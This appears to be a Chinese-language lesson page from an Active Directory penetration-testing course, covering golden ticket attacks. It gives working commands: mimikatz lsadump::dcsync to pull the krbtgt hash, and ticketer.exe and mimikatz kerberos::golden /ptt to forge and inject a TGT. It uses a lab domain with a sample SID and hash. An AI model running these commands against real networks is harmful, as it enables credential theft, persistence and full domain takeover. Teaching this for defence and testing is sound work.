内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
27黄金票据
## 原理 黄金票据一般都是伪造TGT,生成TGT后不需要再和AS进行校验,直接与TGS进行校验。 黄金票据可以在本地直接生成,生成的票据在域内机器或者非域内机器都可以使用。 > 黄金票据的作用 - 权限维持 - 横向移动 > 利用条件 - 必须知道Krbtgt机器账户的HASH值 - 域内域名 - 域的SID值 - 需要伪造的用户(大部分情况下都是administrator) 获取域的SID值命令 ``` whoami /all ```  ## 获取Krbtgt的hash值 两种方式: - 控制域控后直接查询 - 通过dcsync查询 > hash值存储位置 由于Krbtgt是域用户,不是域控上的本地用户,故不会存储在域控SAM文件中,而是在NTDS文件中。 > 控制域控后使用mimikatz直接查询 ``` lsadump::dcsync /domain:xbxaq.com /user:krbtgt ```  > 控制非域控后使用dcsync的技术获取 首先查看当前域用户权限,是否可以使用dcsync的技术 - administrators组 - domain admins组 - enterprise admins组 - 域控制器的计算机账户 以上组内的用户都可以使用dcsync的技术,域控的Administrator 和 system 也可以 mimikatz命令 ``` lsadump::dcsync /domain:xbxaq.com /user:krbtgt ```  ## 制作票据 黄金票据本质上是伪造TGT,既然是伪造所以在任何计算机上都可以进行伪造,生成的TGT票据就可以直接打入内存(PTT),从而实现对整个域的控制。 > ticketer.exe工具 ``` ticketer.exe -domain-sid sid值 -nthash krbtgt-hash -domain 域名 ``` 查看当前计算机所有用户的SID值 ``` whoami /all ```  krbtgt账户的hash值  通过ticketer制作黄金票据 ``` ticketer.exe -domain-sid S-1-5-21-1445356431-3472965171-1941165345 -nthash 607283a6b62ecae1081cb82829d6c464 -domain xbxaq.com administrator ```  > mimikatz工具 通过mimikatz工具直接生成黄金票据,然后注入到内存中 ``` kerberos::golden /user:用户名 /domain:域名 /sid:sid值 /krbtgt:NTLM-HASH值 </ptt> ``` 注意:如果携带/ptt则会自动注入到内存中,不携带则在本地生成票据。 ``` kerberos::golden /user:administrator /domain:xbxaq.com /sid:S-1-5-21-1445356431-3472965171-1941165345 /krbtgt:607283a6b62ecae1081cb82829d6c464 ``` 
毛林
2025年9月7日 11:40
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码